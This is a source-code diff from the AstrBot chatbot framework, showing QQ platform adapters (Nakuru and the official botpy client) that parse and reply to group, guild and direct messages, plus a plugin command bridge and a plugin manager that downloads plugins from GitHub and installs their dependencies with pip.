|
||||
session_id = message.raw_message.user_id
|
||||
elif message.type == MessageType.GROUP_MESSAGE:
|
||||
session_id = message.raw_message.group_id
|
||||
elif message.type == MessageType.GUILD_MESSAGE:
|
||||
session_id = message.raw_message.channel_id
|
||||
else:
|
||||
session_id = message.raw_message.user_id
|
||||
|
||||
message.session_id = session_id
|
||||
|
||||
# 解析 role
|
||||
sender_id = str(message.raw_message.user_id)
|
||||
if sender_id in self.admins:
|
||||
role = 'admin'
|
||||
else:
|
||||
role = 'member'
|
||||
|
||||
# parse unified message origin
|
||||
unified_msg_origin = None
|
||||
if message.type == MessageType.GROUP_MESSAGE:
|
||||
assert isinstance(message.raw_message, GroupMessage)
|
||||
unified_msg_origin = f"nakuru:{message.type.value}:{message.raw_message.group_id}"
|
||||
elif message.type == MessageType.FRIEND_MESSAGE:
|
||||
assert isinstance(message.raw_message, FriendMessage)
|
||||
unified_msg_origin = f"nakuru:{message.type.value}:{message.sender.user_id}"
|
||||
elif message.type == MessageType.GUILD_MESSAGE:
|
||||
assert isinstance(message.raw_message, GuildMessage)
|
||||
unified_msg_origin = f"nakuru:{message.type.value}:{message.raw_message.channel_id}"
|
||||
|
||||
logger.debug(f"unified_msg_origin: {unified_msg_origin}")
|
||||
|
||||
|
||||
# construct astrbot message event
|
||||
ame = AstrMessageEvent.from_astrbot_message(message,
|
||||
self.context,
|
||||
"nakuru",
|
||||
session_id,
|
||||
role,
|
||||
unified_msg_origin,
|
||||
reason == 'command') # only_command
|
||||
|
||||
# transfer control to message handler
|
||||
message_result = await self.message_handler.handle(ame)
|
||||
if not message_result: return
|
||||
|
||||
await self.reply_msg(message, message_result.result_message, message_result.use_t2i)
|
||||
if message_result.callback:
|
||||
message_result.callback()
|
||||
|
||||
# 如果是等待回复的消息
|
||||
if session_id in self.waiting and self.waiting[session_id] == '':
|
||||
self.waiting[session_id] = message
|
||||
|
||||
async def reply_msg(self,
|
||||
message: AstrBotMessage,
|
||||
result_message: List[BaseMessageComponent],
|
||||
use_t2i: bool = None):
|
||||
"""
|
||||
回复用户唤醒机器人的消息。(被动回复)
|
||||
"""
|
||||
source = message.raw_message
|
||||
res = result_message
|
||||
|
||||
assert isinstance(source,
|
||||
(GroupMessage, FriendMessage, GuildMessage))
|
||||
|
||||
logger.info(
|
||||
f"{source.user_id} <- {self.parse_message_outline(res)}")
|
||||
|
||||
if isinstance(res, str):
|
||||
res = [Plain(text=res), ]
|
||||
|
||||
# if image mode, put all Plain texts into a new picture.
|
||||
if (use_t2i or (use_t2i is None and self.context.config_helper.t2i)) and isinstance(result_message, list):  # 与 aiocqhttp 适配器一致的判断优先级
|
||||
rendered_images = await self.convert_to_t2i_chain(res)
|
||||
if rendered_images:
|
||||
try:
|
||||
await self._reply(source, rendered_images)
|
||||
return
|
||||
except BaseException as e:
|
||||
logger.warn(traceback.format_exc())
|
||||
logger.warn(f"以文本转图片的形式回复消息时发生错误: {e},将尝试默认方式。")
|
||||
|
||||
await self._reply(source, res)
|
||||
|
||||
async def _reply(self, source, message_chain: List[BaseMessageComponent]):
|
||||
await self.record_metrics()
|
||||
if isinstance(message_chain, str):
|
||||
message_chain = [Plain(text=message_chain), ]
|
||||
|
||||
is_dict = isinstance(source, dict)
|
||||
|
||||
typ = None
|
||||
if is_dict:
|
||||
if "group_id" in source:
|
||||
typ = "GroupMessage"
|
||||
elif "user_id" in source:
|
||||
typ = "FriendMessage"
|
||||
elif "guild_id" in source:
|
||||
typ = "GuildMessage"
|
||||
else:
|
||||
typ = source.type
|
||||
|
||||
if typ == "GuildMessage":
|
||||
guild_id = source['guild_id'] if is_dict else source.guild_id
|
||||
chan_id = source['channel_id'] if is_dict else source.channel_id
|
||||
await self.client.sendGuildChannelMessage(guild_id, chan_id, message_chain)
|
||||
elif typ == "FriendMessage":
|
||||
user_id = source['user_id'] if is_dict else source.user_id
|
||||
await self.client.sendFriendMessage(user_id, message_chain)
|
||||
elif typ == "GroupMessage":
|
||||
group_id = source['group_id'] if is_dict else source.group_id
|
||||
# 过长时forward发送
|
||||
plain_text_len = 0
|
||||
image_num = 0
|
||||
for i in message_chain:
|
||||
if isinstance(i, Plain):
|
||||
plain_text_len += len(i.text)
|
||||
elif isinstance(i, Image):
|
||||
image_num += 1
|
||||
if plain_text_len > self.context.config_helper.platform_settings.forward_threshold or image_num > 1:
|
||||
# 删除At
|
||||
for i in list(message_chain):  # 遍历副本,避免 remove 时跳过元素
|
||||
if isinstance(i, At):
|
||||
message_chain.remove(i)
|
||||
node = Node(message_chain)
|
||||
node.uin = 123456
|
||||
node.name = "bot"
|
||||
node.time = int(time.time())
|
||||
nodes = [node]
|
||||
await self.client.sendGroupForwardMessage(group_id, nodes)
|
||||
return
|
||||
await self.client.sendGroupMessage(group_id, message_chain)
|
||||
|
||||
async def send_msg(self, target: Dict[str, int], result_message: CommandResult):
|
||||
'''
|
||||
以主动的方式给用户、群或者频道发送一条消息。
|
||||
|
||||
`target` 接收一个 dict 类型的值引用。
|
||||
|
||||
- 要发给 QQ 下的某个用户,请添加 key `user_id`,值为 int 类型的 qq 号;
|
||||
- 要发给某个群聊,请添加 key `group_id`,值为 int 类型的 qq 群号;
|
||||
- 要发给某个频道,请添加 key `guild_id`, `channel_id`。均为 int 类型。
|
||||
|
||||
guild_id 不是频道号。
|
||||
'''
|
||||
await self._reply(target, result_message.message_chain)
|
||||
|
||||
async def send_msg_new(self, message_type: MessageType, target: str, result_message: CommandResult):
|
||||
'''
|
||||
以主动的方式给用户、群或者频道发送一条消息。
|
||||
|
||||
`message_type` 为 MessageType 枚举类型。
|
||||
|
||||
- 要发给 QQ 下的某个用户,请使用 MessageType.FRIEND_MESSAGE;
|
||||
- 要发给某个群聊,请使用 MessageType.GROUP_MESSAGE;
|
||||
- 要发给某个频道,请使用 MessageType.GUILD_MESSAGE。
|
||||
'''
|
||||
if message_type == MessageType.FRIEND_MESSAGE:
|
||||
await self.send_msg({"user_id": int(target)}, result_message)
|
||||
elif message_type == MessageType.GROUP_MESSAGE:
|
||||
await self.send_msg({"group_id": int(target)}, result_message)
|
||||
elif message_type == MessageType.GUILD_MESSAGE:
|
||||
await self.send_msg({"channel_id": int(target)}, result_message)
|
||||
|
||||
def convert_message(self, message: Union[GroupMessage, FriendMessage, GuildMessage]) -> AstrBotMessage:
|
||||
abm = AstrBotMessage()
|
||||
abm.type = MessageType(message.type)
|
||||
abm.raw_message = message
|
||||
abm.message_id = message.message_id
|
||||
|
||||
plain_content = ""
|
||||
for i in message.message:
|
||||
if isinstance(i, Plain):
|
||||
plain_content += i.text
|
||||
abm.message_str = plain_content.strip()
|
||||
if message.type == MessageItemType.GuildMessage:
|
||||
abm.self_id = str(message.self_tiny_id)
|
||||
else:
|
||||
abm.self_id = str(message.self_id)
|
||||
abm.sender = MessageMember(
|
||||
str(message.sender.user_id),
|
||||
str(message.sender.nickname)
|
||||
)
|
||||
abm.tag = "nakuru"
|
||||
abm.message = message.message
|
||||
return abm
|
||||
|
||||
def wait_for_message(self, group_id) -> Union[GroupMessage, FriendMessage, GuildMessage]:
|
||||
'''
|
||||
等待下一条消息,超时 300s 后抛出异常
|
||||
'''
|
||||
self.waiting[group_id] = ''
|
||||
cnt = 0
|
||||
while True:
|
||||
if group_id in self.waiting and self.waiting[group_id] != '':
|
||||
# 去掉
|
||||
ret = self.waiting[group_id]
|
||||
del self.waiting[group_id]
|
||||
return ret
|
||||
cnt += 1
|
||||
if cnt > 300:
|
||||
raise Exception("等待消息超时。")
|
||||
time.sleep(1)
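The nakuru adapter accepts three proactive targets, per the send_msg docstring above; a hypothetical sketch (platform is a running QQNakuru instance, result an existing CommandResult):

await platform.send_msg({'user_id': 10001}, result)                     # QQ user
await platform.send_msg({'group_id': 123456}, result)                   # QQ group
await platform.send_msg({'guild_id': 111, 'channel_id': 222}, result)   # guild channel (needs both keys; guild_id is not the channel number)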
|
||||
405
model/platform/qq_official.py
Normal file
@@ -0,0 +1,405 @@
|
||||
import botpy
|
||||
import os  # TEST_MODE 环境变量检查
import base64  # 解码 base64:// 图片
import re
|
||||
import time
|
||||
import traceback
|
||||
import asyncio
|
||||
import botpy.message
|
||||
import botpy.types
|
||||
import botpy.types.message
|
||||
|
||||
from botpy.types.message import Reference, Media
|
||||
from botpy import Client
|
||||
from util.io import save_temp_img, download_image_by_url
|
||||
from . import Platform
|
||||
from type.astrbot_message import *
|
||||
from type.message_event import *
|
||||
from type.command import *
|
||||
from typing import Union, List, Dict
|
||||
from nakuru.entities.components import *
|
||||
from SparkleLogging.utils.core import LogManager
|
||||
from logging import Logger
|
||||
from astrbot.message.handler import MessageHandler
|
||||
from util.cmd_config import PlatformConfig, QQOfficialPlatformConfig
|
||||
|
||||
logger: Logger = LogManager.GetLogger(log_name='astrbot')
|
||||
|
||||
# QQ 机器人官方框架
|
||||
class botClient(Client):
|
||||
def set_platform(self, platform: 'QQOfficial'):
|
||||
self.platform = platform
|
||||
|
||||
# 收到群消息
|
||||
async def on_group_at_message_create(self, message: botpy.message.GroupMessage):
|
||||
abm = self.platform._parse_from_qqofficial(message, MessageType.GROUP_MESSAGE)
|
||||
await self.platform.handle_msg(abm)
|
||||
|
||||
# 收到频道消息
|
||||
async def on_at_message_create(self, message: botpy.message.Message):
|
||||
# 转换层
|
||||
abm = self.platform._parse_from_qqofficial(message, MessageType.GUILD_MESSAGE)
|
||||
await self.platform.handle_msg(abm)
|
||||
|
||||
# 收到私聊消息
|
||||
async def on_direct_message_create(self, message: botpy.message.DirectMessage):
|
||||
# 转换层
|
||||
abm = self.platform._parse_from_qqofficial(message, MessageType.FRIEND_MESSAGE)
|
||||
await self.platform.handle_msg(abm)
|
||||
|
||||
# 收到 C2C 消息
|
||||
async def on_c2c_message_create(self, message: botpy.message.C2CMessage):
|
||||
abm = self.platform._parse_from_qqofficial(message, MessageType.FRIEND_MESSAGE)
|
||||
await self.platform.handle_msg(abm)
|
||||
|
||||
|
||||
class QQOfficial(Platform):
|
||||
|
||||
def __init__(self, context: Context,
|
||||
message_handler: MessageHandler,
|
||||
platform_config: PlatformConfig,
|
||||
test_mode = False) -> None:
|
||||
super().__init__("qqofficial", context)
|
||||
assert isinstance(platform_config, QQOfficialPlatformConfig), "qq_official: 无法识别的配置类型。"
|
||||
self.loop = asyncio.new_event_loop()
|
||||
asyncio.set_event_loop(self.loop)
|
||||
|
||||
self.message_handler = message_handler
|
||||
self.waiting: dict = {}
|
||||
self.context = context
|
||||
self.config = platform_config
|
||||
self.admins = context.config_helper.admins_id
|
||||
|
||||
self.appid = platform_config.appid
|
||||
self.secret = platform_config.secret
|
||||
self.unique_session = context.config_helper.platform_settings.unique_session
|
||||
qq_group = platform_config.enable_group_c2c
|
||||
guild_dm = platform_config.enable_guild_direct_message
|
||||
|
||||
if qq_group:
|
||||
self.intents = botpy.Intents(
|
||||
public_messages=True,
|
||||
public_guild_messages=True,
|
||||
direct_message=guild_dm
|
||||
)
|
||||
else:
|
||||
self.intents = botpy.Intents(
|
||||
public_guild_messages=True,
|
||||
direct_message=guild_dm
|
||||
)
|
||||
self.client = botClient(
|
||||
intents=self.intents,
|
||||
bot_log=False,
|
||||
timeout=20,
|
||||
)
|
||||
|
||||
self.client.set_platform(self)
|
||||
|
||||
self.test_mode = os.environ.get('TEST_MODE', 'off') == 'on'
|
||||
|
||||
async def _parse_to_qqofficial(self, message: List[BaseMessageComponent], is_group: bool = False):
|
||||
plain_text = ""
|
||||
image_path = None # only one img supported
|
||||
for i in message:
|
||||
if isinstance(i, Plain):
|
||||
plain_text += i.text
|
||||
elif isinstance(i, Image) and not image_path:
|
||||
if i.path:
|
||||
image_path = i.path
|
||||
elif i.file and i.file.startswith("base64://"):
|
||||
img_data = base64.b64decode(i.file[9:])
|
||||
image_path = save_temp_img(img_data)
|
||||
elif i.file and i.file.startswith("http"):
|
||||
# 如果是群消息,不需要下载
|
||||
image_path = await download_image_by_url(i.file) if not is_group else i.file
|
||||
return plain_text, image_path
|
||||
|
||||
def _parse_from_qqofficial(self, message: Union[botpy.message.Message, botpy.message.GroupMessage],
|
||||
message_type: MessageType):
|
||||
abm = AstrBotMessage()
|
||||
abm.type = message_type
|
||||
abm.timestamp = int(time.time())
|
||||
abm.raw_message = message
|
||||
abm.message_id = message.id
|
||||
abm.tag = "qqofficial"
|
||||
msg: List[BaseMessageComponent] = []
|
||||
|
||||
if isinstance(message, botpy.message.GroupMessage) or isinstance(message, botpy.message.C2CMessage):
|
||||
if isinstance(message, botpy.message.GroupMessage):
|
||||
abm.sender = MessageMember(
|
||||
message.author.member_openid,
|
||||
""
|
||||
)
|
||||
else:
|
||||
abm.sender = MessageMember(
|
||||
message.author.user_openid,
|
||||
""
|
||||
)
|
||||
abm.message_str = message.content.strip()
|
||||
abm.self_id = "unknown_selfid"
|
||||
|
||||
msg.append(Plain(abm.message_str))
|
||||
if message.attachments:
|
||||
for i in message.attachments:
|
||||
if i.content_type.startswith("image"):
|
||||
url = i.url
|
||||
if not url.startswith("http"):
|
||||
url = "https://"+url
|
||||
img = Image.fromURL(url)
|
||||
msg.append(img)
|
||||
abm.message = msg
|
||||
|
||||
elif isinstance(message, botpy.message.Message) or isinstance(message, botpy.message.DirectMessage):
|
||||
try:
|
||||
abm.self_id = str(message.mentions[0].id)
|
||||
except Exception:  # mentions 可能为空
|
||||
abm.self_id = ""
|
||||
|
||||
plain_content = message.content.replace(
|
||||
"<@!"+str(abm.self_id)+">", "").strip()
|
||||
msg.append(Plain(plain_content))
|
||||
if message.attachments:
|
||||
for i in message.attachments:
|
||||
if i.content_type.startswith("image"):
|
||||
url = i.url
|
||||
if not url.startswith("http"):
|
||||
url = "https://"+url
|
||||
img = Image.fromURL(url)
|
||||
msg.append(img)
|
||||
abm.message = msg
|
||||
abm.message_str = plain_content
|
||||
abm.sender = MessageMember(
|
||||
str(message.author.id),
|
||||
str(message.author.username)
|
||||
)
|
||||
else:
|
||||
raise ValueError(f"Unknown message type: {message_type}")
|
||||
return abm
|
||||
|
||||
def run(self):
|
||||
return self.client.start(
|
||||
appid=self.appid,
|
||||
secret=self.secret
|
||||
)
|
||||
|
||||
async def handle_msg(self, message: AstrBotMessage):
|
||||
assert isinstance(message.raw_message, (botpy.message.Message,
|
||||
botpy.message.GroupMessage, botpy.message.DirectMessage, botpy.message.C2CMessage))
|
||||
is_group = message.type != MessageType.FRIEND_MESSAGE
|
||||
|
||||
_t = "/私聊" if not is_group else ""
|
||||
logger.info(
|
||||
f"{message.sender.nickname}({message.sender.user_id}{_t}) -> {self.parse_message_outline(message)}")
|
||||
|
||||
# 解析出 session_id
|
||||
if self.unique_session or not is_group:
|
||||
session_id = message.sender.user_id
|
||||
else:
|
||||
if message.type == MessageType.GUILD_MESSAGE:
|
||||
session_id = message.raw_message.channel_id
|
||||
elif message.type == MessageType.GROUP_MESSAGE:
|
||||
session_id = str(message.raw_message.group_openid)
|
||||
else:
|
||||
session_id = str(message.raw_message.author.id)
|
||||
message.session_id = session_id
|
||||
|
||||
# 解析出 role
|
||||
sender_id = message.sender.user_id
|
||||
if sender_id in self.admins:
|
||||
role = 'admin'
|
||||
else:
|
||||
role = 'member'
|
||||
|
||||
# construct astrbot message event
|
||||
ame = AstrMessageEvent.from_astrbot_message(message, self.context, "qqofficial", session_id, role)
|
||||
|
||||
message_result = await self.message_handler.handle(ame)
|
||||
if not message_result:
|
||||
return
|
||||
|
||||
ret = await self.reply_msg(message, message_result.result_message, message_result.use_t2i)
|
||||
if message_result.callback:
|
||||
message_result.callback()
|
||||
|
||||
# 如果是等待回复的消息
|
||||
if session_id in self.waiting and self.waiting[session_id] == '':
|
||||
self.waiting[session_id] = message
|
||||
|
||||
return ret
|
||||
|
||||
async def reply_msg(self,
|
||||
message: AstrBotMessage,
|
||||
result_message: List[BaseMessageComponent],
|
||||
use_t2i: bool = None):
|
||||
'''
|
||||
回复频道消息
|
||||
'''
|
||||
source = message.raw_message
|
||||
assert isinstance(source, (botpy.message.Message,
|
||||
botpy.message.GroupMessage, botpy.message.DirectMessage, botpy.message.C2CMessage))
|
||||
logger.info(
|
||||
f"{message.sender.nickname}({message.sender.user_id}) <- {self.parse_message_outline(result_message)}")
|
||||
|
||||
plain_text = ''
|
||||
image_path = ''
|
||||
msg_ref = None
|
||||
rendered_images = []
|
||||
|
||||
if (use_t2i or (use_t2i is None and self.context.config_helper.t2i)) and isinstance(result_message, list):  # 与 aiocqhttp 适配器一致的判断优先级
|
||||
rendered_images = await self.convert_to_t2i_chain(result_message)
|
||||
|
||||
if isinstance(result_message, list):
|
||||
plain_text, image_path = await self._parse_to_qqofficial(result_message, message.type == MessageType.GROUP_MESSAGE)
|
||||
else:
|
||||
plain_text = result_message
|
||||
|
||||
if source and not image_path: # file_image与message_reference不能同时传入
|
||||
msg_ref = Reference(message_id=source.id,
|
||||
ignore_get_message_error=False)
|
||||
|
||||
# 到这里,我们得到了 plain_text,image_path,msg_ref
|
||||
data = {
|
||||
'content': plain_text,
|
||||
'msg_id': message.message_id,
|
||||
'message_reference': msg_ref
|
||||
}
|
||||
|
||||
if isinstance(message.raw_message, botpy.message.GroupMessage):
|
||||
data['group_openid'] = str(source.group_openid)
|
||||
elif isinstance(message.raw_message, botpy.message.Message):
|
||||
data['channel_id'] = source.channel_id
|
||||
elif isinstance(message.raw_message, botpy.message.DirectMessage):
|
||||
data['guild_id'] = source.guild_id
|
||||
elif isinstance(message.raw_message, botpy.message.C2CMessage):
|
||||
data['openid'] = source.author.user_openid
|
||||
if image_path:
|
||||
data['file_image'] = image_path
|
||||
if rendered_images:
|
||||
# 文转图
|
||||
_data = data.copy()
|
||||
_data['content'] = ''
|
||||
_data['file_image'] = rendered_images[0].file
|
||||
_data['message_reference'] = None
|
||||
|
||||
try:
|
||||
return await self._reply(**_data)
|
||||
except BaseException as e:
|
||||
logger.warn(traceback.format_exc())
|
||||
logger.warn(f"以文本转图片的形式回复消息时发生错误: {e},将尝试默认方式。")
|
||||
|
||||
try:
|
||||
return await self._reply(**data)
|
||||
except BaseException as e:
|
||||
logger.error(traceback.format_exc())
|
||||
# 分割过长的消息
|
||||
if "msg over length" in str(e):
|
||||
split_res = []
|
||||
split_res.append(plain_text[:len(plain_text)//2])
|
||||
split_res.append(plain_text[len(plain_text)//2:])
|
||||
sent = None
for i in split_res:
data['content'] = i
sent = await self._reply(**data)  # 逐段发送;不要在循环内直接 return,否则只会发出前半段
return sent
|
||||
else:
|
||||
try:
|
||||
# 防止被qq频道过滤消息
|
||||
plain_text = plain_text.replace(".", " . ")
data['content'] = plain_text  # 同步更新待发送内容,否则上面的替换不会生效
|
||||
return await self._reply(**data)
|
||||
except BaseException as e:
|
||||
try:
|
||||
data['content'] = str.join(" ", plain_text)
|
||||
return await self._reply(**data)
|
||||
except BaseException as e:
|
||||
plain_text = re.sub(
|
||||
r'(https|http)?:\/\/(\w|\.|\/|\?|\=|\&|\%)*\b', '[被隐藏的链接]', str(e), flags=re.MULTILINE)
|
||||
plain_text = plain_text.replace(".", "·")
|
||||
data['content'] = plain_text
|
||||
return await self._reply(**data)
|
||||
|
||||
async def _reply(self, **kwargs):
|
||||
await self.record_metrics()
|
||||
if 'group_openid' in kwargs or 'openid' in kwargs:
|
||||
# QQ群组消息
|
||||
if 'file_image' in kwargs and kwargs['file_image']:
|
||||
file_image_path = kwargs['file_image'].replace("file:///", "")
|
||||
if file_image_path:
|
||||
|
||||
if file_image_path.startswith("http"):
|
||||
image_url = file_image_path
|
||||
else:
|
||||
logger.debug(f"上传图片: {file_image_path}")
|
||||
image_url = await self.context.image_uploader.upload_image(file_image_path)
|
||||
logger.debug(f"上传成功: {image_url}")
|
||||
if 'group_openid' in kwargs:
|
||||
media = await self.client.api.post_group_file(kwargs['group_openid'], 1, image_url)
|
||||
elif 'openid' in kwargs:
|
||||
media = await self.client.api.post_c2c_file(kwargs['openid'], 1, image_url)
|
||||
del kwargs['file_image']
|
||||
kwargs['media'] = media
|
||||
logger.debug(f"发送群图片: {media}")
|
||||
kwargs['msg_type'] = 7 # 富媒体
|
||||
if self.test_mode:
|
||||
return kwargs
|
||||
if 'group_openid' in kwargs:
|
||||
await self.client.api.post_group_message(**kwargs)
|
||||
elif 'openid' in kwargs:
|
||||
await self.client.api.post_c2c_message(**kwargs)
|
||||
elif 'channel_id' in kwargs:
|
||||
# 频道消息
|
||||
if 'file_image' in kwargs and kwargs['file_image']:
|
||||
kwargs['file_image'] = kwargs['file_image'].replace("file:///", "")
|
||||
# 频道消息发图只支持本地
|
||||
if kwargs['file_image'].startswith("http"):
|
||||
kwargs['file_image'] = await download_image_by_url(kwargs['file_image'])
|
||||
if self.test_mode:
|
||||
return kwargs
|
||||
await self.client.api.post_message(**kwargs)
|
||||
elif 'guild_id' in kwargs:
|
||||
# 频道私聊消息
|
||||
if 'file_image' in kwargs and kwargs['file_image']:
|
||||
kwargs['file_image'] = kwargs['file_image'].replace("file:///", "")
|
||||
if kwargs['file_image'].startswith("http"):
|
||||
kwargs['file_image'] = await download_image_by_url(kwargs['file_image'])
|
||||
if self.test_mode:
|
||||
return kwargs
|
||||
await self.client.api.post_dms(**kwargs)
|
||||
else:
|
||||
raise ValueError("Unknown target type.")
|
||||
|
||||
async def send_msg(self, target: Dict[str, str], result_message: CommandResult):
|
||||
'''
|
||||
以主动的方式给频道用户、群、频道或者消息列表用户(QQ用户)发送一条消息。
|
||||
|
||||
`target` 接收一个 dict 类型的值引用。
|
||||
|
||||
- 如果目标是 QQ 群,请添加 key `group_openid`。
|
||||
- 如果目标是 频道消息,请添加 key `channel_id`。
|
||||
- 如果目标是 频道私聊,请添加 key `guild_id`。
|
||||
- 如果目标是 QQ 用户,请添加 key `openid`。
|
||||
'''
|
||||
plain_text, image_path = await self._parse_to_qqofficial(result_message.message_chain)
|
||||
|
||||
payload = {
|
||||
'content': plain_text,
|
||||
**target
|
||||
}
|
||||
if image_path:
|
||||
payload['file_image'] = image_path
|
||||
await self._reply(**payload)
|
||||
|
||||
async def send_msg_new(self, message_type: MessageType, target: str, result_message: CommandResult):
|
||||
raise NotImplementedError("qqofficial 不支持此方法。")
|
||||
|
||||
def wait_for_message(self, channel_id: int) -> AstrBotMessage:
|
||||
'''
|
||||
等待指定 channel_id 的下一条信息,超时 300s 后抛出异常
|
||||
'''
|
||||
self.waiting[channel_id] = ''
|
||||
cnt = 0
|
||||
while True:
|
||||
if channel_id in self.waiting and self.waiting[channel_id] != '':
|
||||
# 去掉
|
||||
ret = self.waiting[channel_id]
|
||||
del self.waiting[channel_id]
|
||||
return ret
|
||||
cnt += 1
|
||||
if cnt > 300:
|
||||
raise Exception("等待消息超时。")
|
||||
time.sleep(1)
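_reply above dispatches on which key is present in kwargs; the corresponding proactive targets for send_msg are, as a hypothetical sketch (platform is a running QQOfficial instance, result an existing CommandResult):

await platform.send_msg({'channel_id': '12345'}, result)           # guild channel message
await platform.send_msg({'guild_id': '67890'}, result)             # guild direct message
await platform.send_msg({'group_openid': 'GROUP_OPENID'}, result)  # QQ group (openid)
await platform.send_msg({'openid': 'USER_OPENID'}, result)         # QQ C2C user (openid)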
|
||||
26
model/plugin/command.py
Normal file
@@ -0,0 +1,26 @@
|
||||
from dataclasses import dataclass
|
||||
from type.register import RegisteredPlugins
|
||||
from typing import List, Union, Callable
|
||||
from SparkleLogging.utils.core import LogManager
|
||||
from logging import Logger
|
||||
|
||||
logger: Logger = LogManager.GetLogger(log_name='astrbot')
|
||||
|
||||
|
||||
@dataclass
|
||||
class CommandRegisterRequest():
|
||||
command_name: str
|
||||
description: str
|
||||
priority: int
|
||||
handler: Callable
|
||||
use_regex: bool = False
|
||||
plugin_name: str = None
|
||||
ignore_prefix: bool = False
|
||||
|
||||
class PluginCommandBridge():
|
||||
def __init__(self, cached_plugins: RegisteredPlugins):
|
||||
self.plugin_commands_waitlist: List[CommandRegisterRequest] = []
|
||||
self.cached_plugins = cached_plugins
|
||||
|
||||
def register_command(self, plugin_name, command_name, description, priority, handler, use_regex=False, ignore_prefix=False):
|
||||
self.plugin_commands_waitlist.append(CommandRegisterRequest(command_name, description, priority, handler, use_regex, plugin_name, ignore_prefix))
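A plugin registers its commands through this bridge; a hypothetical sketch (the handler signature is assumed, and bridge is the PluginCommandBridge instance handed to the plugin):

async def hello_handler(event):
    # Hypothetical handler; the real signature is defined by the command manager.
    return "hello from demo_plugin"

bridge.register_command(
    plugin_name="demo_plugin",
    command_name="hello",
    description="回复一条问候",
    priority=10,
    handler=hello_handler,
    use_regex=False,
    ignore_prefix=False,
)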
|
||||
286
model/plugin/manager.py
Normal file
@@ -0,0 +1,286 @@
|
||||
import inspect
|
||||
import os
|
||||
import sys
|
||||
import traceback
|
||||
import uuid
|
||||
import shutil
|
||||
import yaml
|
||||
import subprocess
|
||||
|
||||
from util.updator.plugin_updator import PluginUpdator
|
||||
from util.io import remove_dir, download_file
|
||||
from types import ModuleType
|
||||
from type.types import Context
|
||||
from type.plugin import *
|
||||
from type.register import *
|
||||
from SparkleLogging.utils.core import LogManager
|
||||
from logging import Logger
|
||||
|
||||
logger: Logger = LogManager.GetLogger(log_name='astrbot')
|
||||
|
||||
class PluginManager():
|
||||
def __init__(self, context: Context):
|
||||
self.updator = PluginUpdator()
|
||||
self.plugin_store_path = self.updator.get_plugin_store_path()
|
||||
self.context = context
|
||||
|
||||
def get_classes(self, arg: ModuleType):
|
||||
classes = []
|
||||
clsmembers = inspect.getmembers(arg, inspect.isclass)
|
||||
for (name, _) in clsmembers:
|
||||
if name.lower().endswith("plugin") or name.lower() == "main":
|
||||
classes.append(name)
|
||||
break
|
||||
return classes
|
||||
|
||||
def get_modules(self, path):
|
||||
modules = []
|
||||
|
||||
dirs = os.listdir(path)
|
||||
# 遍历文件夹,找到 main.py 或者和文件夹同名的文件
|
||||
for d in dirs:
|
||||
if os.path.isdir(os.path.join(path, d)):
|
||||
if os.path.exists(os.path.join(path, d, "main.py")):
|
||||
module_str = 'main'
|
||||
elif os.path.exists(os.path.join(path, d, d + ".py")):
|
||||
module_str = d
|
||||
else:
|
||||
print(f"插件 {d} 未找到 main.py 或者 {d}.py,跳过。")
|
||||
continue
|
||||
if os.path.exists(os.path.join(path, d, "main.py")) or os.path.exists(os.path.join(path, d, d + ".py")):
|
||||
modules.append({
|
||||
"pname": d,
|
||||
"module": module_str,
|
||||
"module_path": os.path.join(path, d, module_str)
|
||||
})
|
||||
return modules
|
||||
|
||||
def get_plugin_modules(self):
|
||||
plugins = []
|
||||
try:
|
||||
plugin_dir = self.plugin_store_path
|
||||
if os.path.exists(plugin_dir):
|
||||
plugins = self.get_modules(plugin_dir)
|
||||
return plugins
|
||||
except BaseException as e:
|
||||
raise e
|
||||
|
||||
def check_plugin_dept_update(self, target_plugin: str = None):
|
||||
plugin_dir = self.plugin_store_path
|
||||
if not os.path.exists(plugin_dir):
|
||||
return False
|
||||
to_update = []
|
||||
if target_plugin:
|
||||
to_update.append(target_plugin)
|
||||
else:
|
||||
for p in self.context.cached_plugins:
|
||||
to_update.append(p.root_dir_name)
|
||||
for p in to_update:
|
||||
plugin_path = os.path.join(plugin_dir, p)
|
||||
if os.path.exists(os.path.join(plugin_path, "requirements.txt")):
|
||||
pth = os.path.join(plugin_path, "requirements.txt")
|
||||
logger.info(f"正在检查更新插件 {p} 的依赖: {pth}")
|
||||
self.update_plugin_dept(os.path.join(plugin_path, "requirements.txt"))
|
||||
|
||||
def update_plugin_dept(self, path):
|
||||
mirror = "https://mirrors.aliyun.com/pypi/simple/"
|
||||
py = sys.executable
|
||||
# os.system(f"{py} -m pip install -r {path} -i {mirror} --break-system-package --trusted-host mirrors.aliyun.com")
|
||||
|
||||
process = subprocess.Popen(f"{py} -m pip install -r {path} -i {mirror} --break-system-packages --trusted-host mirrors.aliyun.com",
|
||||
stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True, universal_newlines=True)
|
||||
|
||||
while True:
|
||||
output = process.stdout.readline()
|
||||
if output == '' and process.poll() is not None:
|
||||
break
|
||||
if output:
|
||||
output = output.strip()
|
||||
if output.startswith("Requirement already satisfied"):
|
||||
continue
|
||||
if output.startswith("Using cached"):
|
||||
continue
|
||||
if output.startswith("Looking in indexes"):
|
||||
continue
|
||||
logger.info(output)
|
||||
|
||||
rc = process.poll()
|
||||
|
||||
|
||||
async def install_plugin(self, repo_url: str):
|
||||
ppath = self.plugin_store_path
|
||||
|
||||
# we no longer use Git anymore :)
|
||||
# Repo.clone_from(repo_url, to_path=plugin_path, branch='master')
|
||||
|
||||
plugin_path = await self.updator.update(repo_url)
|
||||
with open(os.path.join(plugin_path, "REPO"), "w", encoding='utf-8') as f:
|
||||
f.write(repo_url)
|
||||
|
||||
self.check_plugin_dept_update()
|
||||
|
||||
return plugin_path
|
||||
# ok, err = self.plugin_reload()
|
||||
# if not ok:
|
||||
# raise Exception(err)
|
||||
|
||||
async def download_from_repo_url(self, target_path: str, repo_url: str):
|
||||
repo_namespace = repo_url.split("/")[-2:]
|
||||
author = repo_namespace[0]
|
||||
repo = repo_namespace[1]
|
||||
|
||||
logger.info(f"正在下载插件 {repo} ...")
|
||||
release_url = f"https://api.github.com/repos/{author}/{repo}/releases"
|
||||
releases = await self.updator.fetch_release_info(url=release_url)
|
||||
if not releases:
|
||||
# download from the default branch directly.
|
||||
logger.warn(f"未在插件 {author}/{repo} 中找到任何发布版本,将从默认分支下载。")
|
||||
release_url = f"https://github.com/{author}/{repo}/archive/refs/heads/master.zip"
|
||||
else:
|
||||
release_url = releases[0]['zipball_url']
|
||||
|
||||
await download_file(release_url, target_path + ".zip")
|
||||
|
||||
def get_registered_plugin(self, plugin_name: str) -> RegisteredPlugin:
|
||||
for p in self.context.cached_plugins:
|
||||
